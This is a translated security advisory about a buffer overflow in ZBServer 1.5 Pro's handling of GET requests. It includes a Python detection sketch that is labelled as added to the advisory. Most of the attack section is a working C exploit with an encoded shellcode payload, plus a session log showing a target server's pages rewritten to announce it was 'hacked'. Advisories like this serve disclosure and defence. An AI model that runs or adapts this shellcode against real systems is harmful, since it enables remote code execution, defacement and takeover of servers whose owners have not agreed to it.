Security Vulnerability
ZBServer 1.5 Pro Edition for Win98/NT

Published: 2000-01-29
Updated: 2000-01-29

Affected systems:
ZBServer 1.5 Pro Edition for Microsoft Win98/NT
Unaffected systems:
ZBServer 2.0
Description:
Software information:

ZBServer 1.5 is a multi-purpose Internet/Intranet software package that provides Web, Gopher, FTP and Chat services. Speed, price and ease of use are its competitive advantages over similar products; it supports both Win9x and Windows NT and suits internal and external TCP/IP users of all kinds.

Vulnerability description:

UssLabs discovered a local/remote buffer overflow in this package: the argument of a GET request is not length-checked, so an overlong request overflows a buffer and lets the sender execute arbitrary code on the server.
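The following is an added detection example, not code from the advisory or from |Zan: it inspects raw HTTP request lines for the traits of this overflow (a request target far longer than any legitimate path, non-printable bytes, a run of 0x90 NOP bytes). The thresholds and the sample requests are constructed assumptions.

```python
# Added example, not part of the NSFOCUS advisory or |Zan's code: flags
# request lines shaped like the ZBServer 1.5 GET overflow. Thresholds and
# sample traffic below are constructed assumptions, not advisory values.

MAX_TARGET_LEN = 512      # assumed upper bound for a sane request target
NOP_RUN_THRESHOLD = 16    # assumed: this many consecutive 0x90 bytes is a sled


def parse_request_line(raw: bytes):
    """Split a raw request line into (method, target, version) or None."""
    line = raw.rstrip(b"\r\n")
    # Split on the first space and the last " HTTP/" so a binary target
    # (which may contain tabs or other whitespace bytes) stays intact.
    method, sep, rest = line.partition(b" ")
    if not sep or not method.isalpha():
        return None
    version = b""
    idx = rest.rfind(b" HTTP/")
    if idx != -1:
        rest, version = rest[:idx], rest[idx + 1:]
    return method, rest, version


def longest_nop_run(data: bytes) -> int:
    """Length of the longest run of consecutive 0x90 (x86 NOP) bytes."""
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == 0x90 else 0
        best = max(best, cur)
    return best


def analyze_request_line(raw: bytes) -> dict:
    """Return a verdict ("ok", "suspicious", "malformed") plus findings."""
    parsed = parse_request_line(raw)
    if parsed is None:
        return {"verdict": "malformed", "findings": ["request line does not parse"]}
    method, target, _version = parsed
    findings = []
    if len(target) > MAX_TARGET_LEN:
        findings.append(f"request target length {len(target)} > {MAX_TARGET_LEN}")
    if any(b < 0x20 or b > 0x7E for b in target):
        findings.append("non-printable bytes in request target")
    run = longest_nop_run(target)
    if run >= NOP_RUN_THRESHOLD:
        findings.append(f"NOP sled of {run} bytes")
    verdict = "suspicious" if findings else "ok"
    return {"method": method.decode("ascii"), "verdict": verdict, "findings": findings}


# Constructed sample traffic: one benign request, one oversized GET whose
# target opens with a NOP sled, shaped like the advisory's 770-byte payload.
SAMPLE_LINES = [b"GET /index.html HTTP/1.0\r\n",
                b"GET /" + b"\x90" * 600 + b"A" * 160 + b"\n"]
```

Running `analyze_request_line` over `SAMPLE_LINES` marks only the second line suspicious, with all three findings reported.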

Test method:

WARNING

The following program (method) may be offensive in nature and is provided solely for security research and teaching. Users bear all risk themselves!

|Zan | <izan@galaxycorp.com> provided an exploit program targeting the Spanish version of NT/98:

% lynx http://xxx.xxx.xxx.xxx

WELCOME TO ... blah ... blah ..... (It's the root page)

% lynx xxx.xxx.xxx.xxx/ServerAbusedbyiZan.html

FILE NOT FOUND The request object (/ServerAbusedbyiZan.html) was not found.

% lynx xxx.xxx.xxx.xxx/FileNotAvailable.html

FILE NOT FOUND The request object (/FileNotAvailable.html) was not found.

$ zbsploit xxx.xxx.xxx.xxx

WinNT 4.0 sp5 ZBServer 1.50-r1x exploit http://mareasvivas.cjb.net  

Coded by -=[|Zan]=- izan@galaxycorp.com  

done.

$ lynx http://xxx.xxx.xxx.xxx

WELCOME TO ... blah ... blah ..... (It's the root page again)

% lynx http://xxx.xxx.xxx.xxx/ServerAbusedbyiZan.html

Hello. You are running a ZBServer PRO's buggy version and

you have been abused.

More information can be downloaded from

http://mareasvivas.cjb.net

regards to DeepZone crew (TheWizard, ^Anuska^ and Nemo)

Coded by |Zan.



% lynx xxx.xxx.xxx.xxx/FileNotAvailable.html

Server hacked.

Sploit coded by |Zan

%_


................................................


/** slzbserv.c - local/remote exploit for ZBServer PRO 1.50-r1x (WinNT)
**
** ZBServer PRO 1.50-r1x exploit gets remote server's full control.
** When you attack a vulnerable server you can run arbitrary code
** inside. Firstly, sploit creates an advisory file. It's information
** for administrative use. Later, exploit restores and kills
** overflowed thread but before it patches some error information so
** all error pages will appear like hacked pages.
**
** Compile on Debian with kernel 2.2.12: gcc -o slzbserv slzbserv.c
** run: ./slzbserv hostname
**
** http://mareasvivas.cjb.net /
**
** Coded by |Zan | izan@galaxycorp.com
** **/


#include <stdio.h>
#include <stdlib.h>      /* exit() */
#include <string.h>      /* memcpy() */
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/errno.h>
#include <netdb.h>

#define _PORT 80         /* target HTTP port */
#define _TamBuf 770      /* size of the request below: "GET /" + 765 payload bytes */

char crash[] = "GET /"
               "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
               "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
               "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
               "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
               "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
               "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
               "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
               "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
               "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
               "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
               "\x90\x90\x90\x90\x90\x81\xc7\xc8\x10\x10\x10\x81\xef\x10"
               "\x10\x10\x10\x57\x5e\x33\xc0\x66\xb8\x31\x02\x90\x90\x50"
               "\x59\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99\xc4\x18"
               "\x74\xb1\x89\xd9\x99\xf3\x99\xf1\x19\x99\x99\x99\xf3\x9b"
               "\xf3\x99\xf3\x99\xf1\x99\x99\x99\xd9\x14\x2c\xac\x8b\xd9"
               "\x99\xcf\xf1\x19\x02\xd4\x99\xc3\x66\x8b\xc9\xc2\xf3\x99"
               "\x14\x24\x3a\x89\xd9\x99\xaa\x59\x32\x14\x2c\x3a\x89\xd9"
               "\x99\xcf\xf1\xd3\x98\x99\x99\x09\x14\x2c\x72\x89\xd9\x99"
               "\xcf\xca\xf1\x49\x05\xd4\x99\xc3\x66\x8b\xca\xf1\x05\x02"
               "\xd4\x99\xc3\x66\x8b\xf1\xa9\xd4\xde\x99\xc6\x14\x2c\x3e"
               "\x89\xd9\x99\xf3\xdd\x09\x09\x09\x09\xc0\x35\x33\x7b\x65"
               "\xf3\x99\x23\x31\x02\xd4\x99\x66\x8b\x99\x99\x99\x99\xca"
               "\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc\xfd\xb7\xa5"
               "\xb6\xf1\xab\xa7\xf1\xed\xed\xe9\xa3\xb6\xb6\xee\xee\xee"
               "\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\xfe\xb9"
               "\xb9\xca\xe9\xf5\xf6\xf0\xed\xb9\xfa\xf6\xfd\xfc\xfd\xb9"
               "\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xe4\xa3\xb0\xa5\xf1\xed"
               "\xf4\xf5\xa7\xa5\xf1\xfc\xf8\xfd\xa7\xa5\xed\xf0\xed\xf5"
               "\xfc\xa7\xca\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc"
               "\xfd\xb7\xa5\xb6\xed\xf0\xed\xf5\xfc\xa7\xa5\xb6\xf1\xfc"
               "\xf8\xfd\xa7\xa5\xfb\xf6\xfd\xe0\xa7\xa5\xfa\xfc\xf7\xed"
               "\xfc\xeb\xa7\xd1\xfc\xf5\xf5\xf6\xb7\xb9\xc0\xf6\xec\xb9"
               "\xf8\xeb\xfc\xb9\xeb\xec\xf7\xf7\xf0\xf7\xfe\xb9\xf8\xb9"
               "\xc3\xdb\xca\xfc\xeb\xef\xfc\xeb\xb9\xc9\xcb\xd6\xea\xb9"
               "\xfb\xec\xfe\xfe\xe0\xb9\xef\xfc\xeb\xea\xf0\xf6\xf7\xb9"
               "\xf8\xf7\xfd\xb9\xe0\xf6\xec\xb9\xf1\xf8\xef\xfc\xb9\xfb"
               "\xfc\xfc\xf7\xb9\xf8\xfb\xec\xea\xfc\xfd\xb7\xa5\xe9\xa7"
               "\xd4\xf6\xeb\xfc\xb9\xf0\xf7\xff\xf6\xeb\xf4\xf8\xed\xf0"
               "\xf6\xf7\xb9\xfa\xf8\xf7\xb9\xfb\xfc\xb9\xfd\xf6\xee\xf7"
               "\xf5\xf6\xf8\xfd\xb9\xff\xeb\xf6\xf4\xb9\xf1\xed\xed\xe9"
               "\xa3\xb6\xb6\xee\xee\xee\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7"
               "\xfc\xb7\xf6\xeb\xfe\xb9\xf6\xeb\xb9\xf1\xed\xed\xe9\xa3"
               "\xb6\xb6\xf4\xf8\xeb\xfc\xf8\xea\xef\xf0\xef\xf8\xea\xb7"
               "\xfa\xf3\xfb\xb7\xf7\xfc\xed\xa5\xe9\xa7\xeb\xfc\xfe\xf8"
               "\xeb\xfd\xea\xb9\xed\xf6\xb9\xdd\xfc\xfc\xe9\xc3\xf6\xf7"
               "\xfc\xb9\xfa\xeb\xfc\xee\xb9\xb1\xcd\xf1\xfc\xce\xf0\xe3"
               "\xf8\xeb\xfd\xb5\xb9\xd8\xf7\xec\xea\xf2\xf8\xb9\xf8\xf7"
               "\xfd\xb9\xd7\xfc\xf4\xf6\xb0\xa5\xe9\xa7\xda\xf6\xfd\xfc"
               "\xfd\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb7\xa5\xb6\xfa\xfc"
               "\xf7\xed\xfc\xeb\xa7\xa5\xb6\xfb\xf6\xfd\xe0\xa7\xa5\xb6"
               "\xf1\xed\xf4\xf5\xa7\xb7\xc5\xf1\xed\xf4\xf5\xc5\xca\xfc"
               "\xeb\xef\xfc\xeb\xd8\xfb\xec\xea\xfc\xfd\xfb\xe0\xf0\xc3"
               "\xf8\xf7\xb7\xf1\xed\xf4\xf5\x99\x90\x90\x90\x90\x90\x90"
               "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
               "\x90\x90\x90\x90\x90\xac\xe0\xe3\x01";


int sock;
struct sockaddr_in sock_a;
struct hostent *host;

int main(int argc, char *argv[])
{
    printf("\nWinNT 4.0 sp5 ZBServer PRO 1.50-r1x exploit\n");
    printf("http://mareasvivas.cjb.net\n\n");
    printf("Coded by -=[ |Zan ]=- izan@galaxycorp.com \n\n");

    if (argc < 2) {
        fprintf(stderr, "Error : Usage: %s <hostname> \n", argv[0]);
        exit(0);
    }

    /* resolve the target host name */
    if ((host = gethostbyname(argv[1])) == NULL) {
        perror("gethostbyname");
        exit(-1);
    }

    if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
        perror("create socket");
        exit(-1);
    }

    sock_a.sin_family = AF_INET;
    sock_a.sin_port = htons(_PORT);
    memcpy(&sock_a.sin_addr, host->h_addr, host->h_length);
    if (connect(sock, (struct sockaddr *)&sock_a, sizeof(sock_a)) != 0) {
        perror("create connect");
        exit(-1);
    }

    fflush(stdout);

    /* send the oversized GET request line, then a blank line to end the request */
    write(sock, crash, _TamBuf);
    write(sock, "\n\n", 2);
    printf("done.\n\n");

    close(sock);
    return 0;
}
................................................

Recommendation:
Upgrade to ZBServer 2.0:
http://www.zbsoft.com/zbserver/index.htm

This advisory was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; reproduction without permission is prohibited.